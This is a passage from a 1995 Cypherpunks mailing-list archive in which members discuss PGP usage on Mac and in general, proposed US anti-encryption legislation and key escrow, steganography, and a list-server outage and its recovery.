access.digex.net (Black Unicorn) Date: Fri, 14 Jul 95 14:44:19 PDT Subject: Eudora MacPGP Woes In-Reply-To: <9507141334.AA07025@fugazi.imonics.com> Message-ID: On Fri, 14 Jul 1995, Steven Champeon - Imonics Development wrote: > Date: Fri, 14 Jul 1995 09:34:59 -0400 > From: Steven Champeon - Imonics Development > To: unicorn at access.digex.net, hal9001 at panix.com > Cc: cypherpunks at toad.com > Subject: Re: Eudora MacPGP Woes > > > | From: "Robert A. Rosenberg" > | Subject: Re: Eudora MacPGP Woes > | > | At 14:40 7/8/95, Black Unicorn wrote: > | >I have noticed that an X-Attachement: header is added, but I have no idea > | >how to remove it without opening the Eudora outbox with teachtext or > | >something. > | > | Highlight the file name on the attachments line and hit delete to remove an > | attached file request. > > I guess I'm still confused about why there's an X-Attachment: header being > added. If the file is being generated by MacPGP without using the Applescript, > you can simply open the resulting encoded file (provided it is being ascii- > armored) from within Eudora then copy and paste it into an open Compose > window. Voila. No X-Attachment: header. If you delete the file name on the > attachments line, it also removes the attachment. > > Mr. Unicorn: have you had any luck with the Applescript? You might try > booting without extensions (except for Applescript) and open Eudora > off-line and keep trying. Now that I have begun using the PGPkit versions of the scripts, all is well. No idea what caused the headache. > > Hope this helps, > Steve > 00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa - wichtig! *New Key Information* - Finger for key revocation and latest key update. From cjl at welchlink.welch.jhu.edu Fri Jul 14 16:15:39 1995 From: cjl at welchlink.welch.jhu.edu (cjl) Date: Fri, 14 Jul 95 16:15:39 PDT Subject: ping Message-ID: Cypherpunks, It was my intention to write a little summary of the story in the most recent issue of SCIENCE, which in addition to reporting some progress towards constructing a quantum computer, also reports in a side bar on a Los Alamos demonstration of untappable quantum cryptography in which a message was sent over 14 kilometers of fiberoptic cable and read with a 1% error rate, secure in the knowledge that Eve couldn't possible be listening. However, I have not gotten any mail from the list today which leads me to believe that there is something wrong with the list-server, you couldn't all possible have been struck dumb with terror by the Your-ass-is Grassley Act :-) So this is a test, this is only a test. Had this been a real message I would have sent more details about the stuff in SCIENCE. C. J. Leonard ( / "DNA is groovy" \ / - Watson & Crick / \ <-- major groove ( \ Finger for public key \ ) Strong-arm for secret key / <-- minor groove Thumb-screws for pass-phrase / ) From cme at TIS.COM Fri Jul 14 17:16:05 1995 From: cme at TIS.COM (Carl Ellison) Date: Fri, 14 Jul 95 17:16:05 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) In-Reply-To: <199507141958.MAA06431@comsec.com> Message-ID: <9507142311.AA09635@tis.com> >Date: Thu, 13 Jul 95 11:19:29 -0400 >From: "Brian A. LaMacchia" >>In the subsection that explicitly mentions crypto, it says that it's >>unlawful to put (non-GAK) crypto on an open net, "regardless of whether such >>software has been designated non-exportable". If the phrase "nonexportable" >>means the same thing in the context of this subsection, then provision (b) >>would only seem to apply RICO to stuff that already falls under ITAR. > >What worries me is the first sentence: "each act of distributing >software is considered a predicate act." The crypto section has no GAK exclusion. It makes it as illegal to release GAKed crypto on a net as PGP. I believe that the concern about defining predicate acts this way comes from the RICO requirement that there be TWO instances of a crime in order to pass the test of perpetrating a *pattern of crime* and therefore be ranked as a mobster subject to RICO. My guess is that the intent is that from one placement on an FTP server or one posting to a newsgroup, the perpetrator of that heinous act will have passed his RICO qualification and therefore be subject to having all he owns taken from him. ------- Meanwhile, the Federal civil forfeiture fund goes to good things. The last $9M (I believe it was) went to buying up AT&T DES phones to be made into Clipper phones. Of course, the conversion hasn't happened yet and the DES phones are sitting in a warehouse someplace -- but the $9M fund went to really good use, saving the world from AT&T DES. (sarcasm off) +--------------------------------------------------------------------------+ |Carl M. Ellison cme at acm.org http://www.clark.net/pub/cme/home.html | |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2 | | ``Officer, officer, arrest that man! He's whistling a dirty song.'' | +----------------------------------------------------------- Jean Ellison -+ From hugh at ecotone.toad.com Fri Jul 14 17:17:00 1995 From: hugh at ecotone.toad.com (Hugh Daniel) Date: Fri, 14 Jul 95 17:17:00 PDT Subject: ADMIN: List wipeout and recovery Message-ID: <9507150012.AA03568@ecotone.toad.com> Yeghads, it happened again. Last night at about 22:47 the disk partition that holds the cypherpunks mail list filled up and when someone tryed to sub/un-scribe using Majordomo the list got zeroed. No one broke into the system to do any evil, it's just confusion, rotten software and poor management by yours truley that casued the problem. Next problem was that toad.com had changed a lot in the last 9 months, and we had moved things about in such a way that I did not seem to have any backups of the file! Today our gracious host, John Gilmore called up to see what the problem was and if there was any way to fixit. Using two heads was better than one and we realized that we had a online backup only 2 days old. Minutes later it was installed and the list is back to where it was late on 1995/07/11. So, some of you will need to un-subscribe again, our apologies about that. I will dig out the lost messages and make a digest-ish like post of everything that was posted since about 22:30 last night. I will also look at moving away from MajorDomo as list software due to its being moribund, old, stupid and bothersome! Thanks also goes to L. McCarthy for sending pleasant email to the right folks (majordomo-owner at toad.com is best) to lets us know that there was a problem. If you have any questions please send them directly to me as the list is allready full of off topic posts (big hint folks...). ||ugh Daniel Majordomo Potty Trainer majordomo-owner at toad.com From cme at TIS.COM Fri Jul 14 17:23:05 1995 From: cme at TIS.COM (Carl Ellison) Date: Fri, 14 Jul 95 17:23:05 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) In-Reply-To: <199507141952.MAA06381@comsec.com> Message-ID: <9507142327.AA10694@tis.com> >Date: Wed, 12 Jul 95 18:20:07 -0400 >From: "Brian A. LaMacchia" >Finally, we begin to see the attack on all forms of un-escrowed >encryption. The bill provides an affirmable defense of >giving the keys to the government ahead of time! > > `(c) It shall be an affirmative defense to prosecution under this > section that the software at issue used a universal decoding device > or program that was provided to the Department of Justice prior to > the distribution.'. This isn't escrowed encryption being allowed here. This is straight giving of keys (or a back door) to the gov't. Even Clipper fails this test. - Carl From lmccarth at cs.umass.edu Fri Jul 14 17:23:14 1995 From: lmccarth at cs.umass.edu (L. McCarthy) Date: Fri, 14 Jul 95 17:23:14 PDT Subject: Stego Standards Silly ? (Was: Re: def'n of "computer network") Message-ID: <9507150023.AA10363@cs.umass.edu> Hugh seems to have restored the full list on Majordomo, so I'll forward the last couple of messages I sent/received yesterday that should have gone to the whole list.... -Futplex Forwarded message: >From lmccarth Fri Jul 14 00:12:07 1995 Subject: Stego Standards Silly ? (Was: Re: def'n of "computer network") To: cypherpunks at toad.com (Cypherpunks Mailing List) In-Reply-To: <9507140229.AA13447 at snark.imsi.com> from "Perry E. Metzger" at Jul 13, 95 10:29:29 pm -----BEGIN PGP SIGNED MESSAGE----- .pm writes: > Indeed -- how could the recipient even know to look, unless these > things arrived regularly and with a fully standardized form of > stegonography, in which case why bother, all you've done is come up > with a very odd form of transfer encoding. I agree, but AFAICS an odd form of transfer encoding is exactly what the doctor ordered. For plausible cryptodeniability, one wants to send ciphertext using a transfer encoding that doesn't automatically ring alarm bells. Steganography amounts to laundering Content-Type: headers. > If the recipient does know to look, that implies either that there is > a hint, in which case the stegonography is useless, or it implies that > you have prearrangement, in which case my comments on prearrangement > hold. If the recipient isn't getting spammed with GIFs (or whatever), she (or rather her MDA) can simply look at all of them by default. Of course this does not help with anonymous message pools on the order of Usenet, but that is a sub-issue. Deranged Mutant raised an IMHO important issue a few months ago. He suggested that Mallet could go about trashing the purportedly "random" bits in each instantiation of some transfer encoding used in a stego standard. For example, he shuffles the LSBs of every passing JPEG. I'm not sure how feasible this would really be (both technically and sociopolitically), but it could be a big annoyance if only a few people were suspected of using stego method XYZ. The standard answer to agent-in-the-middle tampering is of course digital signatures. Now, the question is, will we be allowed to sign our possibly-stego-enclosing GIFs with reasonable confidence that the govt. can't forge our signatures ? Obviously the signature itself can't be stegoed, or else we fall into an infinite regress. -Futplex -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMAXuSWf7YYibNzjpAQHlpQP/f3/e5iRl67zU3TLYZH1oNBBjC1+LYPH8 VkQMhvtRdlo2xBkY56jaZ6hZuzWanknVD1EKrG72vl5sPytXXDs5dVplFlelVw6f VjC2UxNHe0dQHmmJqXNMMq4qlC8ZxgtNf4P9O+6iJKjz6SbA7F6LuRd+3TXv5tHm xgGSY5bzJp8= =ia+X -----END PGP SIGNATURE----- From stewarts at ix.netcom.com Fri Jul 14 18:11:56 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 14 Jul 95 18:11:56 PDT Subject: Mr. Newbie... Message-ID: <199507150109.SAA06854@ix3.ix.netcom.com> At 05:35 PM 7/13/95 -0400, The Gate wrote: > > Okay folks, here comes Mr. Newbie. > > Duh...How can I figure out how to use pgp. Is there a good place >to learn the background and basics in a step-by-step easy to understnad >way? Duh... I think I wanna know... The documentation that comes with PGP isn't bad; read the pgpdoc1 and pgpdoc2 files. (If you buy ViaCrypt, you get them in nice spiral-bound manuals, but it's basically the same stuff.) Here's an overview of the basics: - RSA public-key encryption lets you create a public encryption key which you can publish, so that other people can encrypt files that can only be decrypted with your private key. It also lets you sign files by decrypting them with your private key, which other people can check by encrypting with your public key to get the original message (or a hash of it) back. What makes this mathematically cool is that it does it in a way that takes exponentially long amounts of time to find your private key from the public key, so anybody who wants to crack a reasonably long key needs to run a big hairy computer for about the age of the planet to do so, but you can do decryption reasonably fast because you already know the private key, and the same algorithm works well for both encryption and digital signatures. - RSA encryption isn't very fast, so most real programs that use it encrypt the file with a conventional crypto algorithm (PGP uses IDEA) using a randomly chosen session key, and encrypt the session key with RSA; it's a lot faster. - The problem with public-key encryption is that anybody who wants to send you a message needs to be sure they've really got _your_ public key instead of a key that some Bad Guy published saying "Here's Alice's public key - trust me!". Since RSA can do digital signatures, PGP uses them to create a "Web of Trust", where you can sign a message saying "Here is Alice's key, signed Bob", and anybody who's got a good copy of your key (and trusts you) will know they've got a good copy of Alice's key. If they didn't get a copy of your key directly from you, they may have a message saying "Here's Bob's key, signed Carol", or maybe they got that and Carol's key, signed by Dave, and they know Dave personally so they've checked it with him. How big a Web of Trust can you trust? Well, you probably need more security if you're running a revolution than if you're trying to find out if a Usenet article is genuine or bogus, so PGP lets you choose, but the default is 4 levels deep. - OK, so how do you get PGP? - there's an occasional publication on the net that tells you where, but you can get it from ftp.ox.ac.uk by ftp with no hassle. Inside the US, you want version 2.6.2 for non-commercial use, and you have to buy ViaCrypt's licensed version if you want to sell services using it. Outside the US, the version's something like 2.6.2i or something ending in i. 3.0 will be out "Real Soon Now", probably in 1995, but it's hard work. Versions are available for DOS, Mac, Unix, and a few less popular OSs. ViaCrypt has a special Windows version; the rest of us Windows users can either run it from DOS or use a front-end program like Private Idaho (ftp.eskimo.com/joelm/) or WinPGP, available from popular FTP sites. If you're using the Unix version, it's assumed you know how to read readme files and compile using Make; DOS folks get binary as well as source and documentation. Unix folks will notice that the command line has this ugly DOS feel to it :-) - So you've got it installed and you've read the documentation, and messed with the config.txt file if you didn't like the default options, and now you want to do something. Type "pgp -h" to get help, or "pgp -k" to get help with keys for a reminder. Then type "pgp -kg" to generate a key - you probably want a 768-bit or 1024-bit key for normal use, unless you're paranoid or have a slow computer. Because RSA keys are long strings of binary data that are hard for humans to remember, PGP stores them in a file, encypted with IDEA, and will prompt you for a "passphrase" for the encryption. Make it something long and complicated enough to be secure, but easy for you to remember without writing it in a yellow sticky-note, and not blatantly obvious. You'll need to use it any time you decrypt a file somebody else sent you, or sign a file you're sending to someone else. You'll also need a name - typical format looks like Bob Dobbs which has your name and email address. Most of the time you'll just use an abbreviation and let pgp figure it out. To send your key to someone else, once you've generated it, type "pgp -kx Dobbs filename" and it'll create a file you can mail somebody else which will let them encrypt stuff to you. To decrypt a file you got from someone else, type "pgp filename", which will do the right thing for decryption, checking signatures, receiving new keys, etc. To encrypt a file to someone else, type "pgp -e filename theirname" and pgp will create a file called filename.asc (or filename.pgp if you don't have the ascii-armor option set, which you should.) To sign a file to send somebody, type "pgp -s filename", which will do the same, and there are various options you should read in the manual. # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com From sandfort at crl.com Fri Jul 14 18:12:43 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Fri, 14 Jul 95 18:12:43 PDT Subject: ping In-Reply-To: Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, On Fri, 14 Jul 1995, cjl wrote: > However, I have not gotten any mail from the list today which leads me to > believe that there is something wrong with the list-server, you couldn't > all possible have been struck dumb with terror by the Your-ass-is > Grassley Act :-) Nawh, We're all out celebrating Bastille Day. Aren't you? S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From bal at martigny.ai.mit.edu Fri Jul 14 18:28:39 1995 From: bal at martigny.ai.mit.edu (Brian A. LaMacchia) Date: Fri, 14 Jul 95 18:28:39 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) In-Reply-To: <9507142311.AA09635@tis.com> Message-ID: <9507150128.AA16854@toad.com> Date: Fri, 14 Jul 95 19:11:39 EDT From: Carl Ellison Cc: cypherpunks at toad.com Sender: owner-cypherpunks at toad.com Precedence: bulk [I've combined parts of Carl's two recent messages...] I believe that the concern about defining predicate acts this way comes from the RICO requirement that there be TWO instances of a crime in order to pass the test of perpetrating a *pattern of crime* and therefore be ranked as a mobster subject to RICO. My guess is that the intent is that from one placement on an FTP server or one posting to a newsgroup, the perpetrator of that heinous act will have passed his RICO qualification and therefore be subject to having all he owns taken from him. I agree with Carl here. The crypto section has no GAK exclusion. It makes it as illegal to release GAKed crypto on a net as PGP. The proposed 1030A(c) provides a defense to prosecution under 1030A(a). So if GAKed crypto satisfies 1030A(c) then it can be deployed without fear of prosecution under 1030A(a). It might still violate ITAR, of course, although I suspect any system that satisfies 1030A(c) would be granted a CJ. > `(c) It shall be an affirmative defense to prosecution under this > section that the software at issue used a universal decoding device > or program that was provided to the Department of Justice prior to > the distribution.'. This isn't escrowed encryption being allowed here. This is straight giving of keys (or a back door) to the gov't. Even Clipper fails this test. Why doesn't GAK satisfy this clause? Clearly if the keys are escrowed with two Dept. of Justice entities (or if there's only one escrow agent and it's a DOJ entity) then DOJ will have been provided with sufficient information to decode any encryted information by themselves. Certainly commercial escrow systems (such as TIS's CKE[*] system with DRCs (data recovery centers) and DRFs (data recovery fields)) could fail this test, since the chosen escrow agents may not be subject to DOJ control. But I could build a CKE system with an "overriding UI (user identifier)" that had access to all the keys, and provide that UI to DOJ. The "universal decoding device" would then be to go to the DRC, present that UI and the DRF and recover the desired information. I don't see how Clipper fails the 1030A(c) test, except possibly for the fact that the proposed escrow agents were not both within DOJ. I think that's a minor point. --bal [*] See ftp://ftp.tis.com/pub/crypto/drc/papers/drc.ps, Carl's initial description of the TIS CKE system. From lmccarth at cs.umass.edu Fri Jul 14 18:46:41 1995 From: lmccarth at cs.umass.edu (L. McCarthy) Date: Fri, 14 Jul 95 18:46:41 PDT Subject: Timothy C. May: Re: Crisis Overload (re Electronic Racketeering) Message-ID: <9507150146.AA11209@cs.umass.edu> Tim's original transmission of the following message didn't make it out to the (briefly annulled) list. I've already replied to Tim in private, but I'll offer my apologies if I've misled anyone as to whose mail originally went where. -Futplex Forwarded message: > From tcmay at sensemedia.net Fri Jul 14 02:01:08 1995 > Date: Thu, 13 Jul 1995 23:03:50 -0700 > X-Sender: tcmay at mail.sensemedia.net > Message-Id: > Mime-Version: 1.0 > Content-Type: text/plain; charset="us-ascii" > To: futplex at pseudonym.com, cypherpunks at toad.com > From: tcmay at sensemedia.net (Timothy C. May) > Subject: Re: Timothy C. May: Re: Crisis Overload (re Electronic Racketeering) > > At 2:57 AM 7/14/95, L. McCarthy wrote: > >> Perry, > >> > >> I have all I'm going to take of your acerbic rudeness to me. > >> > >> I will no longer be responding to any of your messages. > >> > >> --Tim > > > > > > > >Everybody needs to take a deep breath and count to 1,000. Seriously, > >we're all feeling plenty of stress today. Various people have been > >talking about getting out of the U.S. while the going's good (?), and > >it doesn't sound much like hyperbole this time. It's not surprising that > >we're releasing our frustration on each other, lashing out at the nearest > >quasi-tangible targets. > > Note that I didn't post that to the list. > > Your requoting it, without the intermediate quoting of the person who _did_ > post it to the list, makes it appear I was spewing this garbage to the > list, when I wasn't. > > I don't care for your pop psychology. I would've followed your advice and > left these comments in e-mail only, had you done the same. > > --Tim May > > .......................................................................... > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero > 408-728-0152 | knowledge, reputations, information markets, > Corralitos, CA | black markets, collapse of governments. > Higher Power: 2^756839 | Public Key: PGP and MailSafe available. > "National borders are just speed bumps on the information superhighway." From gnu at toad.com Fri Jul 14 18:50:53 1995 From: gnu at toad.com (John Gilmore) Date: Fri, 14 Jul 95 18:50:53 PDT Subject: IEEE P1363 (public key crypto) standards meeting after Crypto Message-ID: <9507150150.AA17439@toad.com> Even if you aren't going to Crypto, there are draft standards documents, etc, FTP-able. See below. I haven't read them yet. John Date: Thu, 13 Jul 95 10:56:18 PDT From: Burt Kaliski To: pem-dev at TIS.COM Subject: Meeting announcement IEEE P1363: Standard for RSA, Diffie-Hellman and Related Public-Key Cryptography MEETING NOTICE Thursday, August 31, 1995, 1:00-6:00pm Friday, September 1, 1995, 9:00-6:00pm University of California, Santa Barbara, CA This meeting of the P1363 working group, open to the public, will focus on the editing of a draft standard for RSA, Diffie-Hellman and other public-key cryptography. The meeting follows the CRYPTO '95 conference, held August 27-31 at the same location. AGENDA 1. Approval of Agenda 2. Approval of Minutes from May Meeting 3. Officers' Reports 4. Update on Patent Issues 5. Proposals for New Sections 6. Meeting Schedule 7. Editorial Work (schedule to be determined based on availability of draft material) 8. New Work Assignments Depending on the amount of editorial work, the meeting may end sooner than 6:00pm Friday. If you'd like to participate, contact Burt Kaliski, the working group's chair, at RSA Laboratories, 100 Marine Parkway, Redwood City, CA 94065. Phone: (415) 595-7703, FAX: (415) 595-4126, E-mail: burt at rsa.com. Draft sections and copies of previous minutes are available via anonymous ftp to ftp.rsa.com in the "pub/p1363" directory. The working group's electronic mailing list is ; to join, send e-mail to . There will be a meeting fee, though the amount has not yet been established, pending arrangements with the university. It will also be possible for participants to arrange accommodations at the university. DIRECTIONS (excerpted from the CRYPTO announcement) The campus is located approxmately two miles from the Santa Barbara airport, which is served by several airlines, including American, America West, United and US Air. All major rental car agencies are also represented in Santa Barbara, and AMTRAK has rail connections to San Francisco from the north and Los Angeles from the south. Santa Barbara is approximately 100 miles north of the Los Angeles airport, and 350 miles south of San Francisco. For more information on the CRYPTO '95 conference, contact Stafford Tavares, the general chair, at (613) 545-2945 or . From don at cs.byu.edu Fri Jul 14 19:30:32 1995 From: don at cs.byu.edu (Donald M. Kitchen) Date: Fri, 14 Jul 95 19:30:32 PDT Subject: Free The World Web Server project.. :) Message-ID: <199507150229.UAA23961@bert.cs.byu.edu> Hooking up a mass mailer to congress seems like a bad idea to me, because they're really only interested in their constituants. If they start getting mass mailings, they might start thinking there's only one person or a small group of people "behind the curtain". Sending results of an e-petition, however, would be unobtrusive. A web page that mails a form letter to _your_ congressperson's form-letter-readers (ie staff readers) would be much better, IMHO. Don From shamrock at netcom.com Fri Jul 14 19:39:53 1995 From: shamrock at netcom.com (Lucky Green) Date: Fri, 14 Jul 95 19:39:53 PDT Subject: ping Message-ID: At 19:13 7/14/95, cjl wrote: >Cypherpunks, > >It was my intention to write a little summary of the story in the most >recent issue of SCIENCE Can you scan it in? -- Lucky Green PGP encrypted mail preferred. From jya at pipeline.com Fri Jul 14 20:12:23 1995 From: jya at pipeline.com (John Young) Date: Fri, 14 Jul 95 20:12:23 PDT Subject: MYS_fit Message-ID: <199507150312.XAA23783@pipe3.nyc.pipeline.com> 7-14-95. NYPaper Page Oner: "2 Groups of Physicists Produce Matter That Einstein Postulated." By chilling a cloud of atoms to a temperature barely above absolute zero, scientists at a Colorado laboratory have at last created a bizarre type of matter that had eluded experimenters ever since its potential existence was postulated by Albert Einstein 70 years ago. The creation of this Bose-Einstein condensate -- named for Einstein, and the Indian theorist Satyendra Nath Bose -- was hailed yesterday as the basis of a new field of research expected to explain some fundamental mysteries of atomic physics. A Texas group later produced similar results. The achievement should allow physicists to peer directly into the realm of the ultrasmall. MYS_fit [This was also reported in The Economist of July 1.] From jya at pipeline.com Fri Jul 14 20:13:51 1995 From: jya at pipeline.com (John Young) Date: Fri, 14 Jul 95 20:13:51 PDT Subject: SEK_hel Message-ID: <199507150313.XAA23951@pipe3.nyc.pipeline.com> 7-14-95. NYPaper: "U.S. Spells Out Antitrust Inquiry Into Microsoft." The Justice Department said today that the Microsoft Corporation might well be violating antitrust laws by including software for its new on-line network in Windows 95, its much-anticipated operating system for personal computers. JUS_kid "Sting on Internet Leads to a Child Sex Case." In a case involving child pornography, the Internet and a self-appointed enforcer whom one critical defense lawyer calls an "electronic vigilante," a Nevada man is facing prison for crossing state lines with the intention of having sex with a 14 year-old girl he had met on a popular computer network. SHE_dev [Editorial] "The Guns of Waco and Ruby Ridge." There is little doubt that the Federal Government contributed heavily to two of the biggest law enforcement fiascoes in recent memory. One was the disastrous 1993 Federal raid on the Branch Davidian compound at Waco, Tex. The other was the tragic 1992 encounter between the F.B.I. and a band of white separatists at Ruby Ridge, Idaho. LIT_bub 3: SEK_hel From bal at martigny.ai.mit.edu Fri Jul 14 21:08:58 1995 From: bal at martigny.ai.mit.edu (Brian A. LaMacchia) Date: Fri, 14 Jul 95 21:08:58 PDT Subject: S. 982 Kyl-Leahy(-Grassley) NII Protection Act Message-ID: <9507150408.AA21123@toad.com> S. 982 is "the other bill" introduced recently in the Senate, the National Information Infrastructure Protection Act of 1995 (introduced by Sens. Kyl, Leahy and Grassley). Since it has bipartisan support plus the support of the Attorney General I thought it might be a good idea to see what it really does. I've made available via WWW the following documents: The text of S. 982: The National Information Infrastructure Protection Act of 1995; The text of 18 USC 1030 as it is currently; The text of 18 USC 1030 as modified by S. 982; Sen. Kyl's statement introducing S. 982; Sen. Leahy's statement introducing S. 982; A section-by-section analysis of S. 982 provided by Sens. Kyl and Leahy; All are available from my "Legal Issues" page at: http://www-swiss.ai.mit.edu/~bal/legal/ The "text of 18 USC 1030 as modified by S. 982" is perhaps the most interesting, since it shows both text removed by the bill (in italics) and text added by the bill (in boldface). --bal From unicorn at xanadu.mindport.net Fri Jul 14 21:39:32 1995 From: unicorn at xanadu.mindport.net (Black Unicorn) Date: Fri, 14 Jul 95 21:39:32 PDT Subject: Ssh and Macintosh applications. Message-ID: <199507150535.AAA00185@xanadu.mindport.net> Having looked over the Ssh blurbs, I can't help but want to use it. NOW. Is anyone more skillful than I going to try and port some sort of support for those of us who are using a Mac with, say, a direct connection to a provider using Ssh? Please? From sebaygo at intellinet.com Fri Jul 14 22:03:43 1995 From: sebaygo at intellinet.com (Allen Robinson) Date: Fri, 14 Jul 95 22:03:43 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) Message-ID: I'm posting this again, not because I think it contains any particularly profound insights, but rather because I initially sent it around midnight last night and it was not reflected here so I suppose it did not make it out. AR ---------- Forwarded message ---------- Date: Fri, 14 Jul 1995 00:12:14 -0500 (CDT) From: Allen Robinson To: Ray Arachelian Cc: Cypherpunks Mailing List Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd) On Thu, 13 Jul 1995, Ray Arachelian wrote: > On Thu, 13 Jul 1995, L. McCarthy wrote: > > > Mr. GRASSLEY. Mr. President, I rise this evening to introduce the > > Anti-electronic Racketeering Act of 1995. This bill makes important changes > > to RICO and criminalizes deliberately using computer technology to engage in > > criminal activity. I believe this bill is a reasonable, measured and strong > > response to a growing problem. According to the computer emergency and > > response team at Carnegie-Mellon University, during 1994, about 40,000 > > computer users were attacked. Virus hacker, the FBI's national computer > > crime squad has investigated over 200 cases since 1991. So, computer crime is > > clearly on the rise. > > Eh, what do "virus hackers" have to do with encryption, why is it these > morons justify the destruction of encryption by mentioning hackers and > viruses? The use of terms such as "virus" and "hacker" in a context such as this has little or nothing to do with what the terms actually mean. It's palpably obvious that they are being bandied about here solely for the knee-jerk emotional reactions they evoke. Even those more computer/net clue-impaired than Grassley (assuming that such is possible) know from watching TV and the movies that a virus is a Bad Thing (tm) and that hackers are evil! Pseudo-digital demagoguery. > Additionally, does this mean that someone outside of the USA is in danger > of being grabbed by RICO armed thugs from Uncle Sam's cadre for writing > crypto software and publishing it in the open? After all, once it winds > up on some USA site, how do we know that someone outside the USA got his > copy of SuperDuperNSASpookFree from a non-US site? Just to be sure, > we'll bust both the site operator and nab the guy who wrote it next time > he drops in, or hell, we'll have him extradited. Or simply kidnap him and escort him back to the U.S. > > I believe we need to seriously reconsider > > the Federal Criminal Code with an eye toward modernizing existing statutes > > and creating new ones. In other words, Mr. President, Elliot Ness needs to > > meet the Internet. > > Where is Elliot Ness? I don't see any mafia.org on the net. Anyone here > see any such site? It might be even more beneficial if Senator Grassley and the other members of our august deliberative bodies would meet the internet. My gut reaction to the recent tide of legislation is that they are seeking to stangle what they fear and that they fear what they do not understand. (Too melodramatic?) > > Mr. President, I sit on the Board of the Office of Technology Assessment. > > That Office has clearly indicated that organized crime has entered cyberspace > > in a big way. International drug cartels use computers to launder drug money > > and terrorists like the Oklahoma City bombers use computers to conspire to > > commit crimes. > > Was it not proven that McVeigh and Co. >DID NOT< use a computer? THe AOL > account was a hoax, no? Where are the hoardes of anti-USA terrorists, > and drug pushers on the net? You don't recognize them because they are masquerading as "virus hackers". Again, the main reason for playing the "terrorist" card is for the emotional hot-buttons they can push by so doing. Since Grassley didn't use it, look for someone to introduce something this session titled, "The Avenge Those Poor, Innocent, Bloody Dead Children Act of 1995". AR %#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#% "Government is not reason... it is force. Like fire, it is a dangerous servant and a fearful master." - George Washington +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Allen Robinson...................................sebaygo at intellinet.com PGP public key AD022AA9 fingerprint 5A3BC05B2EC67724 F5664A20AEEAB07A From kinney at bogart.Colorado.EDU Fri Jul 14 23:14:23 1995 From: kinney at bogart.Colorado.EDU (W. Kinney) Date: Fri, 14 Jul 95 23:14:23 PDT Subject: MYS_fit In-Reply-To: <199507150312.XAA23783@pipe3.nyc.pipeline.com> Message-ID: <199507150614.AAA05933@bogart.Colorado.EDU> O.K., this is totally off any reasonable topic, but allow me the indulgence: > "2 Groups of Physicists Produce Matter That Einstein > Postulated." I've been hanging around Carl Weiman's lab for a couple of years (a friend of mine works on one of the projects), and this is one hell of an achievement. The apparatus they use sits on a tabletop, and you can watch the gas through infared T.V. cameras in real time. The trap is just a little vacuum chamber with windows in the side. They use the same diode lasers that come in your C.D. player, an ingeniously inexpensive setup. Yow! -- Will From tcmay at sensemedia.net Fri Jul 14 23:52:09 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Fri, 14 Jul 95 23:52:09 PDT Subject: ADMIN: List wipeout and recovery Message-ID: At 12:12 AM 7/15/95, Hugh Daniel wrote: >to fixit. Using two heads was better than one and we realized that we >had a online backup only 2 days old. Minutes later it was installed ^^^^^^^^^^^ >and the list is back to where it was late on 1995/07/11. I think your backup is a lot older than 2 days old, as a "who cypherpunks" request showed this as my list address: .... talon57 at well.sf.ca.us tcmay at netcom.com (Timothy C. May) tentacle at hclb.demon.co.uk .... I haven't been subscribed as "tcmay at netcom.com" since mid-June. Since mid-June I've been subscribed as "tcmay at sensemedia.net". Why did I get this message at my sensemedia.net address if in fact "who cypherpunks" shows my subscription address is only at Netcom? Beats me. I checked and I am not subscribed under both addresses, and a grep of the "who cypherpunks" list doesn't show a sensemedia.net address for me. Maybe the "who cypherpunks" at 16:21 today is a different backup list than the supposedly 2-day old list.... Something for the X Files, perhaps. --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From tj at compassnet.com Sat Jul 15 01:05:16 1995 From: tj at compassnet.com (Bolivar Shagnasty) Date: Sat, 15 Jul 95 01:05:16 PDT Subject: Crisis Overload (re Electronic Racketeering) Message-ID: Originally sent to list during server failure: ---------------Included Message--------------- Perry Metzger wrote: >"Robert A. Hayden" writes: >> We've seen the enemy, that the are the 535 senators and representatives >> in D.C., and the staff in the White House. It's time to shore up our >> allies and enter the battle witht he best weapons we have; information >> and popular use. > >As unpleasant as the congress is, it isn't the enemy. The governmental >forces desiring control are not the same as the congress. This is true. IMNSHO we are witnessing yet another case of the representation of an illegitimate constituency. Grassley is not representing the people of his state -- he is representing and carrying water for federal government interests. While some people used to acidly refer to "The Senator from Texaco" and such, it is a much more common situation that some Senators and Representatives represent federal agencies in matters before their chamber that virtually NO VOTER would ever think of or could even discover as a matter of personal interest. You can be sure Cathy Cornflower of Cherokee didn't start this by writing Grassley and suggesting that RICO be expanded to cover distribution of non-GAK crypto. It is inconceivable that more than a tiny handful of Grassley's constituents would even recognize anything in his bill if stopped on the street and asked about it. Agencies develop "friendly" congresscritters like the Soviets used to develop "friendly" journalists and politicos. It wouldn't even be all that surprising if similar methods are used. The "friendlies" take obscure and no-so-obscure issues before their house on behalf of the agencies. At some level this is probably necessary, but with all those folks getting comfy with each other up there in Disneyland-on-the-Potomac, it's impossible that unholy alliances do not develop. The "us vs them" mentality of 